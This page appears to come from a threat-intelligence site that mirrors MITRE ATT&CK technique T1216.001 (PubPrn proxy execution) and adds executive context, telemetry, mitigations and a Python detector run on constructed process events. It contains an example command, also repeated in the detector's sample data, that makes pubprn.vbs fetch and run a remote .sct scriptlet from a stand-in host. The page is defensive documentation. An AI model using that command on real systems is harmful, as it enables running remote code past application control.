T1216.001: PubPrn
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.[1]
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.[2] To do so, adversaries may set the second parameter to a script: moniker that references a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, instead of the script: moniker, which could be used to reference remote code via HTTP(S).
Analyst context for executives and security teams
PubPrn matters because it is a trusted Windows script that can be abused as a stealthy proxy for running remote malicious content, especially where controls trust Microsoft-signed scripts too broadly. For leaders, the issue is less the printer-publishing function itself and more whether endpoint execution controls, script monitoring, and Windows version baselines can distinguish legitimate administrative use from abuse.
Executive priority
Prioritize this as a Windows execution-control and monitoring validation item. It can affect audit confidence in application control, SOC visibility for signed-script abuse, and incident response triage when trusted Windows utilities appear in suspicious execution chains. Because later Windows 10+ versions restrict the abused remote-proxy behavior, asset age and operating system consistency are important risk factors.
Technical view
Validate coverage for PubPrn.vbs execution on Windows, especially when launched through Cscript.exe or Windows Command Shell and when arguments deviate from expected printer publishing to LDAP paths. ATT&CK provides no official detection text, but relationship context identifies DET0528, Detecting Remote Script Proxy Execution via PubPrn.vbs. SOC teams should test whether command-line capture, script-host monitoring, endpoint behavior prevention, and application-control logs expose attempts to use PubPrn as part of System Script Proxy Execution under T1216.
Likely telemetry
- Windows process creation events including parent process, child process, and full command line for cscript.exe and PubPrn.vbs
- Script host execution telemetry for Visual Basic script activity
- Command shell execution history involving PubPrn.vbs
- Network telemetry from endpoints showing script-host or related process access to remote HTTP(S) resources
- Application control, script blocking, or execution-prevention events
Detection direction
- Confirm DET0528-style logic exists or can be implemented for remote script proxy execution via PubPrn.vbs.
- Tune for PubPrn.vbs usage with unexpected second-parameter patterns, especially non-LDAP remote content references, while allowing for legitimate printer publishing activity where it exists.
- Correlate process command line, parent process, network destination, and endpoint control events rather than relying only on file reputation or Microsoft signature trust.
- Account for Windows version differences: later Windows 10+ behavior limits the described remote proxy technique, so detection expectations may differ across legacy and current assets.
- Review false positives from administrators or print management processes that legitimately publish printers to Active Directory Domain Services.
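As an added illustration of the detection direction above (example code written for this page, not part of ATT&CK or Glexia's analysis), the following Python check runs over constructed process-creation events, modelled on Sysmon Event ID 1 fields, and flags script-host launches of pubprn.vbs whose second parameter is not an LDAP:// path; the Printing_Admin_Scripts location used in the sample is an assumed typical path.

```python
import re

# Constructed sample events (not real telemetry), shaped like Sysmon Event ID 1 records.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cscript.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cscript "C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs" '
                    r"Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com"},          # legitimate publish
    {"Image": r"C:\Windows\System32\cscript.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cscript pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct"},
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript.exe //nologo pubprn.vbs Printer2 http://example.invalid/x.sct"},
    {"Image": r"C:\Windows\System32\cscript.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cscript other.vbs script:https://mydomain.com/a.sct"},      # not pubprn
]

SCRIPT_HOSTS = ("cscript.exe", "wscript.exe")
PUBPRN_NAMES = ("pubprn", "pubprn.vbs")   # the ATT&CK example omits the extension


def basename(path):
    """Last component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted runs together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(event):
    """Return None for irrelevant or expected events, otherwise a short reason string."""
    if basename(event["Image"]) not in SCRIPT_HOSTS:
        return None
    tokens = tokenize(event["CommandLine"])
    idx = next((i for i, t in enumerate(tokens) if basename(t) in PUBPRN_NAMES), None)
    if idx is None:
        return None
    # Script arguments follow the script name; drop //-style host switches such as //nologo.
    args = [t for t in tokens[idx + 1:] if not t.startswith("//")]
    if len(args) < 2:
        return None                      # usage banner only, nothing to publish
    target = args[1]
    if target.upper().startswith("LDAP://"):
        return None                      # expected printer publishing to AD DS
    if re.match(r"(?i)^script:", target):
        return f"script: moniker in second parameter: {target}"
    if re.match(r"(?i)^https?://", target):
        return f"remote HTTP(S) reference in second parameter: {target}"
    return f"non-LDAP second parameter: {target}"


def detect(events):
    """Return (parent, command line, reason) for every event that warrants review."""
    return [(e["ParentImage"], e["CommandLine"], r) for e in events if (r := classify(e))]
```

Correlate each hit with the parent process and any outbound HTTP(S) connection from the script host before escalating, as the detection direction above recommends.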
Mitigation priorities
- Apply execution prevention controls such as application control and script blocking for unauthorized or unnecessary script execution, aligned to M1038.
- Use endpoint behavior prevention controls to identify and block suspicious process and script behavior, aligned to M1040.
- Reduce exposure from legacy Windows systems where the remote proxy behavior may remain possible; verify Windows 10+ baselines where applicable.
- Restrict trusted-script allow rules so Microsoft-signed scripts are not automatically permitted to proxy arbitrary execution without context.
- Document legitimate PubPrn administrative use so exceptions are narrow, reviewable, and defensible for compliance evidence.
Analyst notes and limits
This is a Windows sub-technique of System Script Proxy Execution and is associated with stealth in the supplied ATT&CK object. Relationship context also notes use by APT32, but that should be treated as historical ATT&CK context rather than evidence of current targeting in any local environment.
ATT&CK provides no official detection text for this object, so detection recommendations rely on the supplied behavior description and the DET0528 relationship. Local validation is required to determine whether PubPrn.vbs exists, whether legitimate printer-publishing workflows use it, which Windows versions are present, and whether command-line, script, network, and control telemetry are actually collected.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Related techniques
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1216 | System Script Proxy Execution | This object is a sub-technique of System Script Proxy Execution. |
Groups, software, and campaigns
G0050: APT32
APT32 is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.[1][2][3]
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 3.0 | | Current bundle | 97fb7d7675e6… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] pubprn: Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.
- [2] Enigma0x3 PubPrn Bypass: Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.
- [3] mitre-attack T1216.001
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.